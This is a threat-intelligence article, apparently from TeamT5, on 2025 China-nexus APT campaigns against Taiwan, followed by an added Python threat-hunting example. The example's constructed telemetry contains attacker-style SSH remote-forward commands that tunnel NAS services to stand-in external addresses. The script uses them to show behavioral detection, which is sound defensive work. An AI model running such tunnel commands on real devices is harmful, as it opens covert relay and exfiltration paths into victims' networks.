As geopolitical tensions across the APAC region continue to rise, APT activity in the region is intensifying in both volume and sophistication. In 2025, TeamT5 tracked more than 510 APT operations affecting 67 countries worldwide, a steady increase from 2024. Of these, 173 attacks targeted Taiwan, a level of activity that stands out even against other regional targets.
Years of observation show that Taiwan is the most persistently and intensively targeted environment for cyber operations, and that the majority of the activity observed originates from China.
Taiwan's geopolitical significance and its weight in the global technology supply chain make it an especially attractive target for actors pursuing intelligence collection and long-term intrusions in support of political and military objectives. Given the scale, diversity, and long duration of these campaigns, Taiwan is not merely a front-line target but also an early-warning indicator of how China-nexus intrusion techniques evolve.
In practice, campaigns observed in Taiwan frequently adopt new tools and evolving TTPs (tactics, techniques, and procedures) before they appear elsewhere. Taiwan therefore functions not only as a target but as a proving ground where China-nexus APTs test and refine their tradecraft before deploying it in other regions.
Key Trends: Targeting of Edge Devices, Abuse of Trusted Services, and Disposable Malware
As defenders continue to harden endpoints with capabilities like EDR, threat actors are adapting by shifting operations to layers with comparatively limited telemetry and weaker detection coverage. That shift is reflected in our 2025 findings: we tracked 27 critical vulnerabilities, most of which impacted edge devices such as firewalls, routers, and VPN appliances. Moreover, China-nexus actors have paired exploitation with custom backdoors tailored to specific device families. These backdoors are often designed to persist even after the underlying vulnerability is patched or the device is rebooted. This transforms one-time perimeter access into long-term access across victim networks and significantly raises the difficulty of detection and complete eradication. In addition, Internet of Things (IoT) devices are increasingly being abused by threat actors for a range of malicious objectives, particularly as low-noise infrastructure that blends into normal network traffic. For example, we observed actors chaining compromised IoT devices into operational relay box (ORB) networks to stage and route attacks, effectively obscuring the origin of malicious activity. In other cases, actors have abused Network Attached Storage (NAS) systems as reverse SSH tunnel relays, facilitating data exfiltration through an intermediary that often appears benign.
Supply chain attacks accelerated further in 2025, reinforcing what TeamT5 describes as the “Fail-of-Trust Model.” In a supply chain attack, threat actors compromise software vendors, managed service providers, or cloud service providers to exploit inherited trust and pivot into their downstream customer environments. In Taiwan, TeamT5 observed multiple attacks in which Chinese actors (e.g., Huapi and SLIME86) first compromised upstream IT service providers, then leveraged that access to move laterally into government, military, and critical infrastructure networks. In other notable cases attributed to the China-nexus groups SocialNetworkTeam and SLIME40 (aka Salt Typhoon), threat actors compromised national telecom networks and used that access for long-term traffic interception and surveillance, including DNS manipulation and ISP-level hijacking. These campaigns directly erode a foundational assumption of the digital ecosystem: that “trusted” suppliers are secure. By weaponizing trusted relationships as attack paths, supply chain operations turn implicit trust into a liability, hence the “Fail-of-Trust Model.” Consistent with this shift, we observed a clear uptick in 2025 attacks aimed at the IT sector. Threat actors are increasingly treating IT providers as strategic infrastructure, using them as launchpads to reach downstream targets more efficiently and at far greater scale.
Malware deployment tradecraft also evolved in 2025. Across the 300+ malicious samples we tracked, we saw a clear rise in customized, disposable “one-time” malware. Much of it consisted of lightweight loaders and downloaders which are quick to build, easy to tailor to a specific intrusion chain, and inherently more capable of evading signature-based detection. In parallel, we increasingly observed multi-tool intrusion stacks, where actors deploy more than one malware family and/or a mix of malware and legitimate hacking tools within the same operation. This reduces single points of failure: if one component is detected or blocked, others can maintain access, pivot laterally, or re-establish command-and-control. For defenders, the result is a broader, more fragmented footprint that slows triage and makes complete eradication harder.
From APT Groups to a China-nexus “Whole-of-Nation” APT Ecosystem
The observed increase in volume and sophistication of APT operations occurs in parallel with increasing signs of a maturing APT ecosystem in China. Over the years, China has been cultivating its offensive cyber capabilities through a “whole-of-nation” model: the state retains strategic direction (e.g., prioritizing intelligence requirements and target sets) while execution capacity is expanded through a market of contractors, brokers, and specialist vendors. Public attributions and industry reporting over the last few years increasingly describe a threat landscape in which the boundary between “state” and “private sector” is operationally blurred, producing an industrial-scale pipeline for intrusions. The Chinese APT ecosystem blends state direction with “hacking-as-a-service” dynamics: capability is packaged, priced, and delivered in units that can be purchased, tasked, or repurposed. The 2024 I-Soon leak showed how a private Chinese company conducted intrusions and monetized access, and how such contractor capacity can be integrated into state-aligned operations.
In 2025, more evidence surfaced—via indictments, sanctions packages, and leaked materials—that Chinese private-sector vendors are not merely tooling suppliers but can play operational roles across intrusion activity. Taken together, these disclosures point to an ecosystem that is becoming more modular and specialized as it scales. That industrialization is most visible in the shift from a traditional “one APT group runs the full kill chain” assumption to a service-layered model. Instead of one team doing everything end-to-end, different providers can contribute capabilities at distinct stages. Examples map cleanly onto this cyber supply chain: At the front end are large-scale reconnaissance providers conducting internet-wide scanning and target profiling; Midstream are developers producing exploits, modular malware components, and tailored one-time payloads, optimized for specific environments; At the back end are infrastructure operators who specialize in command-and-control, proxy layers, and operational relay box (ORB) networks. This division of labor enables faster iteration, higher operational tempo, and greater resiliency.
Looking Forward
For governments, enterprises, and critical sectors worldwide, the lesson is clear: indicator-driven defense cannot keep up with an industrialized intrusion ecosystem that can quickly change tools, servers, and routes when exposed. Defenders therefore have to move upstream to proactive, hypothesis-driven threat hunting that prioritizes durable behaviors over short-lived signatures. This approach shifts the objective from “blocking known bad” to finding active tradecraft early, before the adversary completes collection and exfiltration.
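The following is an added example, not code from the report or from TeamT5, that makes the "durable behaviors over short-lived signatures" point concrete using the NAS reverse-SSH-tunnel relay described in the Key Trends section above. It runs two hunts over a small set of constructed process-start events (the hostnames, roles, IP addresses, and command lines are all invented for the example): an IOC hunt that matches a single known C2 address, and a behavioral hunt that flags any storage or IoT device launching `ssh` with a remote port forward (`-R`) to a non-internal destination, regardless of which IP the actor is using this week. The `INTERNAL_NETS` list and the `nas`/`iot` roles are assumptions standing in for an asset inventory.

```python
import ipaddress
import shlex

# Constructed sample telemetry (not real data): process-start events as an EDR or
# syslog pipeline might deliver them, with the device class from an assumed inventory.
EVENTS = [
    {"host": "nas-01", "role": "nas",
     "cmd": "ssh -N -R 2222:127.0.0.1:22 user@203.0.113.10"},
    {"host": "nas-02", "role": "nas",
     "cmd": "ssh -o StrictHostKeyChecking=no -fN -R 8080:localhost:445 r@198.51.100.7 -p 443"},
    {"host": "nas-01", "role": "nas",
     "cmd": "rsync -av /volume1/backup admin@10.0.0.5:/backup"},
    {"host": "dev-laptop", "role": "workstation",
     "cmd": "ssh -L 5432:db.internal:5432 dev@10.0.0.9"},
    {"host": "cam-07", "role": "iot",
     "cmd": "/bin/busybox telnetd"},
]

# Hypothetical IOC from an earlier report: one C2 address. The second relay in the
# sample uses a different address, the short-lived detail an actor rotates when exposed.
KNOWN_BAD_IPS = {"203.0.113.10"}

# Assumed "internal" ranges; a real hunt would take these from the asset inventory.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                  "127.0.0.0/8", "169.254.0.0/16")]

# ssh options that consume a following argument, so the parser skips their values.
SSH_OPTS_WITH_ARG = {"-o", "-p", "-i", "-L", "-R", "-D", "-J", "-l", "-F", "-b",
                     "-c", "-e", "-m", "-O", "-Q", "-S", "-W", "-w", "-E", "-I", "-B"}


def ioc_match(events):
    """Signature-style hunt: does the command line contain a known-bad address?"""
    return [e for e in events if any(ip in e["cmd"] for ip in KNOWN_BAD_IPS)]


def parse_ssh(cmd):
    """Return (remote_forwards, destination) for an ssh command line, else None."""
    try:
        argv = shlex.split(cmd)
    except ValueError:
        return None
    if not argv or argv[0].rsplit("/", 1)[-1] != "ssh":
        return None
    forwards, dest, i = [], None, 1
    while i < len(argv):
        arg = argv[i]
        if arg == "-R" and i + 1 < len(argv):          # separate form: -R spec
            forwards.append(argv[i + 1]); i += 2; continue
        if arg.startswith("-R") and len(arg) > 2:       # attached form: -Rspec
            forwards.append(arg[2:]); i += 1; continue
        if arg in SSH_OPTS_WITH_ARG:                    # option plus its value
            i += 2; continue
        if arg.startswith("-"):                         # bundled flags like -fN
            i += 1; continue
        dest = arg                                      # first non-option: [user@]host
        break
    return forwards, dest


def is_external(hostspec):
    """True if the destination is outside INTERNAL_NETS (unresolved names count as external)."""
    host = hostspec.rsplit("@", 1)[-1]
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return True
    return not any(ip in net for net in INTERNAL_NETS)


def behavior_hunt(events, relay_roles=("nas", "iot")):
    """Behavioral hunt: storage/IoT device opens an ssh remote forward to an external host."""
    hits = []
    for e in events:
        parsed = parse_ssh(e["cmd"])
        if parsed is None:
            continue
        forwards, dest = parsed
        if forwards and dest and e["role"] in relay_roles and is_external(dest):
            hits.append({"host": e["host"], "dest": dest.rsplit("@", 1)[-1],
                         "forwards": forwards})
    return hits


if __name__ == "__main__":
    print("IOC hunt:     ", [e["host"] for e in ioc_match(EVENTS)])
    print("Behavior hunt:", behavior_hunt(EVENTS))
```

Over the sample, the IOC hunt returns only nas-01, because nas-02 talks to an address the report never listed; the behavioral hunt returns both relays and ignores the workstation's local forward (`-L`) and the NAS's routine rsync job. The rule describes what a relay has to do to function, so the actor cannot evade it by rotating infrastructure.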
But hunting alone is not enough, because this is an ecosystem problem. Effective defense also requires deep regional intelligence that explains how the ecosystem is organized. That context turns scattered telemetry into actionable understanding, enabling defenders to distinguish who is responsible for reconnaissance, initial access, payload delivery, and infrastructure enablement. With those roles mapped, defenders can better anticipate likely next moves in the kill chain and apply disruption at the points of greatest leverage.
TeamT5 believes meaningful impact depends on international collaboration grounded in shared adversary insight. In other words, defenders must compete with an industrial system by responding as a coordinated system. TeamT5 is committed to doing our part: contributing high-quality cyber threat intelligence, supporting joint response efforts, and strengthening the partnerships that make collective defense work.
About TeamT5
TeamT5 is a threat intelligence company focused on the APAC region. Drawing on Taiwan's unique geopolitical vantage point, multilingual capability, and more than 20 years of research, it specializes in APT and ransomware threats across Asia-Pacific and provides highly localized, actionable threat intelligence and defensive solutions to government agencies, financial institutions, and the technology sector.
We believe effective cybersecurity begins with continuously tracking and deeply understanding threats. With research at its core, TeamT5 delivers that understanding as actionable threat intelligence organizations can apply to their defenses, helping them anticipate risk, move from reactive response to proactive defense, and reduce their cyber risk.
As an organization that practices intelligence-driven cyber defense, TeamT5 continuously monitors emerging threats, analyzes attack trends, and responds early to limit damage. Valuing trust and collaboration, it actively shares its research at leading cybersecurity conferences and international forums. By working closely with the global security community, customers, and partners, TeamT5 promotes the practical use of threat intelligence and helps strengthen organizational cyber resilience.